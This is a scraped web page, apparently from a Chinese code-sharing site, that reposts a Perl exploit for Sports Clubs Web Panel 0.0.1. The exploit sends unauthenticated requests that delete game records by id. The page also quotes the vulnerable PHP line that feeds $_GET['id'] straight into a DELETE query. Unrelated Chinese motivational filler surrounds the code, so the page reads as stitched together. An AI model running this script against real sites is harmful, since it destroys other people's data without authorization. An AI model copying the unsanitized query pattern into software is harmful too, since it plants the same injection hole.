Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit

我们永远不能怪罪任何帮了倒忙的志愿者。他们是一心对你好,别让他们心凉。相信自已。不要妄加评判自已,也不会把自已交给别人评判,更不会贬低自已。
#!/usr/bin/perl -W # Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit
# File affected: include/draw-delete.php (id) # Vuln Code: # 06: $did = $_GET['id'];
# 08: mysql_query("DELETE FROM draw WHERE did='$did'"); # by ka0x <ka0x01 [at] gmail [dot] com>
# D.O.M Labs - Security Researchers
# - www.domlabs.org -
# # ka0x@domlabs:~/codes$ ./sportspanel.pl http://localhost/sportspanel 3
use LWP::UserAgent; my $host = $ARGV[0];
my $did = $ARGV[1]; die &_USAGE unless $ARGV[1]; sub _USAGE
{
die "
- Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit -
- by ka0x (www.domlabs.org) usage: ./$0 <host> <valid_game_id>
ex: ./$0 http://localhost/sportspanel 2
";
} my $ua = LWP::UserAgent->new() or die;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1"); my $req = HTTP::Request->new(GET => $host."/?p=draw-delete&id=".$did);
my $res = $ua->request($req);
my $con = $res->content; if ($res->is_success){
if($con =~ /$did/){
print "[ ] The Game \"$did\" has been deleted from the database!\n";
}
} else{
print "[-] Exploit Failed!";
} __END__

以上就是Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit 。谁都不傻,总是敷衍,都会渐行渐远;谁也不笨,没被看重,都要越来越淡。更多关于Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit 请关注haodaima.com其它相关文章!

标签: